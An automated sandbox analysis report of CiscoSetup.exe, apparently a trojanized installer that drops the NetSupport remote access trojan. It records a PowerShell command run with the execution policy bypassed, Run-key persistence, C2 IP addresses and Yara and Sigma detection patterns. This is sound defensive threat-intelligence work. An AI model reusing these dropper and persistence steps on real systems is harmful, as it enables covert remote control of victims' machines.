Windows Analysis Report
CiscoSetup.exe

Overview

General Information

Sample name: CiscoSetup.exe
Analysis ID: 1546660
MD5: 446a85d94adb8e2e9157170b82592d6a
SHA1: 1ea726940904e568dbdc4a6ef50b61cae6bb55ea
SHA256: 65110470f6c6c96877e96a640adcf6178186b675e6d1bc24c19f977a12220294
Tags: exeOMICAREJOINTSTOCKCOMPANYuser-SquiblydooBlog
Infos:

Detection

NetSupport RAT, NetSupport Downloader
Score: 54
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 33
Range: 0 - 100

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected NetSupport Downloader
Bypasses PowerShell execution policy
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Powershell drops PE file
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

  • System is w10x64
  • CiscoSetup.exe (PID: 2196 cmdline: "C:\Users\user\Desktop\CiscoSetup.exe" MD5: 446A85D94ADB8E2E9157170B82592D6A)
    • CiscoSetup.tmp (PID: 5500 cmdline: "C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp" /SL5="$103C8,13456411,1058304,C:\Users\user\Desktop\CiscoSetup.exe" MD5: BFD84005E52425F9B8FE658B9663E1C4)
      • powershell.exe (PID: 3412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • client32.exe (PID: 4176 cmdline: "C:\Users\user\AppData\Roaming\Cisco\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • client32.exe (PID: 1112 cmdline: "C:\Users\user\AppData\Roaming\Cisco\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • client32.exe (PID: 6484 cmdline: "C:\Users\user\AppData\Roaming\Cisco\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\Cisco\client32.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
00000009.00000000.2495587028.0000000000404000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
0000000A.00000000.2576329982.0000000000404000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000009.00000002.2497690917.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
0000000A.00000002.2577820279.0000000000404000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
10.2.client32.exe.6dec0000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
6.2.client32.exe.400000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
10.0.client32.exe.400000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
9.2.client32.exe.400000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
9.0.client32.exe.400000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
amsi32_3412.amsi.csv | JoeSecurity_NetSupportDownloader | Yara detected NetSupport Downloader | Joe Security |
amsi32_3412.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (listed below)
                                  • 0x2e4f74:$b1: ::WriteAllBytes(
                                  • 0x2e4f3e:$b2: ::FromBase64String(
                                  • 0x2f16a0:$s1: -join
                                  • 0x2eae4c:$s4: +=
                                  • 0x2eaf0e:$s4: +=
                                  • 0x2ef135:$s4: +=
                                  • 0x2f1252:$s4: +=
                                  • 0x2f153c:$s4: +=
                                  • 0x2f1682:$s4: +=
                                  • 0x2f4e98:$s4: +=
                                  • 0x2f4f9c:$s4: +=
                                  • 0x2f83f8:$s4: +=
                                  • 0x2f8ad8:$s4: +=
                                  • 0x2f8f8e:$s4: +=
                                  • 0x2f8fe3:$s4: +=
                                  • 0x2f9257:$s4: +=
                                  • 0x2f9286:$s4: +=
                                  • 0x2f97ce:$s4: +=
                                  • 0x2f97fd:$s4: +=
                                  • 0x2f98dc:$s4: +=
                                  • 0x2fbb73:$s4: +=

                                  System Summary

                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp" /SL5="$103C8,13456411,1058304,C:\Users\user\Desktop\CiscoSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp, ParentProcessId: 5500, ParentProcessName: CiscoSetup.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", ProcessId: 3412, ProcessName: powershell.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp" /SL5="$103C8,13456411,1058304,C:\Users\user\Desktop\CiscoSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp, ParentProcessId: 5500, ParentProcessName: CiscoSetup.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", ProcessId: 3412, ProcessName: powershell.exe
                                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp" /SL5="$103C8,13456411,1058304,C:\Users\user\Desktop\CiscoSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp, ParentProcessId: 5500, ParentProcessName: CiscoSetup.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", ProcessId: 3412, ProcessName: powershell.exe
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Cisco\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyApp
                                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3412, TargetFilename: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dll
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp" /SL5="$103C8,13456411,1058304,C:\Users\user\Desktop\CiscoSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp, ParentProcessId: 5500, ParentProcessName: CiscoSetup.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", ProcessId: 3412, ProcessName: powershell.exe

                                  Remote Access Functionality

                                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3412, TargetFilename: C:\Users\user\AppData\Roaming\Cisco\NSM.LIC
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-01T12:11:19.931659+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.6 | 49748 | TCP
2024-11-01T12:12:00.477050+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.6 | 60861 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-01T12:10:58.103251+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 60703 | 151.236.16.15 | 443 | TCP
2024-11-01T12:10:58.103251+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 60707 | 199.188.200.195 | 443 | TCP

                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,6_2_110AC820
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,9_2_110AC820
                                  Source: is-2J155.tmp.2.drBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_d49f9afc-4
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEXE: C:\Users\user\AppData\Roaming\Cisco\remcmdstub.exeJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEXE: C:\Users\user\AppData\Roaming\Cisco\client32.exeJump to behavior

                                  Compliance

                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEXE: C:\Users\user\AppData\Roaming\Cisco\remcmdstub.exeJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEXE: C:\Users\user\AppData\Roaming\Cisco\client32.exeJump to behavior
                                  Source: CiscoSetup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: CiscoSetup.exeStatic PE information: certificate valid
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Cisco\msvcr100.dllJump to behavior
                                  Source: CiscoSetup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000006.00000002.4600795851.000000006DEC2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000009.00000002.2498300418.000000006DEC2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000A.00000002.2580406925.000000006DEC2000.00000002.00000001.01000000.0000000C.sdmp, PCICHEK.DLL.4.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\ApiShim\Win32\Release\vpnapishim.pdb source: is-V8S0O.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\WebHelper\Plugin\Win32\Release\acwebhelper.pdb&&&GCTL source: is-S9VDU.tmp.2.dr
                                  Source: Binary string: ws\Mion.pdb source: powershell.exe, 00000004.00000002.2458265497.000000000756A000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.4.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2457352280.00000000074C0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\InstallHelper\Win32\Release\InstallHelper.pdb source: is-H5812.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\ApiShim\Win32\Release\vpnapishim.pdb...GCTL source: is-V8S0O.tmp.2.dr
                                  Source: Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\vccorlib140.i386.pdb source: is-OJMRD.tmp.2.dr
                                  Source: Binary string: C:\Users\build\p4files\ngc\Phoenix\third-party\libcurl\out.win.7.x86\curl-7.84.0\builds\libcurl-vc-x86-release-dll-ssl-dll-ipv6-sspi-obj-lib\accurl.pdb source: is-2J155.tmp.2.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\WebHelper\Plugin\Win32\Release\acwebhelper.pdb source: is-S9VDU.tmp.2.dr
                                  Source: Binary string: C:\Users\build\p4files\ngc\Quicksilver\third-party\openssl\out.win.7.x86\ciscossl-1.1.1t.7.2.500\acciscossl.pdb source: is-VTDA9.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\PhoneHome\Win32\Release\acfeedback.pdb source: is-2TJID.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\proj_Phoenix_VS20190.730599493905\proj_Phoenix_VS2019\vpn\VA\NDIS6\x64\Release\vpnva64-6.pdbGCTL source: is-EUMLH.tmp.2.dr
                                  Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.4600362190.0000000068B31000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2498047838.0000000068B31000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000A.00000002.2580034650.0000000068B31000.00000020.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2409667962.0000000003148000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\proj_Phoenix_VS20190.730599493905\proj_Phoenix_VS2019\vpn\VA\NDIS6\x64\Release\vpnva64-6.pdb source: is-EUMLH.tmp.2.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\InstallHelper\x64\Release\InstallHelper64.pdb source: is-KLEUG.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\InstallHelper\x64\Release\InstallHelper64.pdb; source: is-KLEUG.tmp.2.dr
                                  Source: Binary string: client32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users\build\p4files\ngc\Quicksilver\third-party\openssl\out.win.7.x86\ciscossl-1.1.1t.7.2.500\acciscossl.pdbAAA source: is-VTDA9.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\PhoneHome\Win32\Release\acfeedback.pdbMM/GCTL source: is-2TJID.tmp.2.dr
                                  Source: Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\vccorlib140.i386.pdbGCTL source: is-OJMRD.tmp.2.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000006.00000002.4600671174.0000000068BF5000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 00000009.00000002.2498203499.0000000068BF5000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000A.00000002.2580255021.0000000068BF5000.00000002.00000001.01000000.0000000D.sdmp
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,6_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,6_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,6_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,6_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_11064E30
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1102D059 PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102D059
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1102CEB1 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102CEB1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,9_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,9_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,9_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,9_2_110BC3D0

                                  Networking

                                  Source: Network traffic Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.6:60703 -> 151.236.16.15:443
                                  Source: Network traffic Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.6:60707 -> 199.188.200.195:443
                                  Source: Yara match File source: amsi32_3412.amsi.csv, type: OTHER
                                  Source: Yara match File source: C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1, type: DROPPED
                                  Source: Yara match File source: C:\Program Files (x86)\Cisco\unins000.dat, type: DROPPED
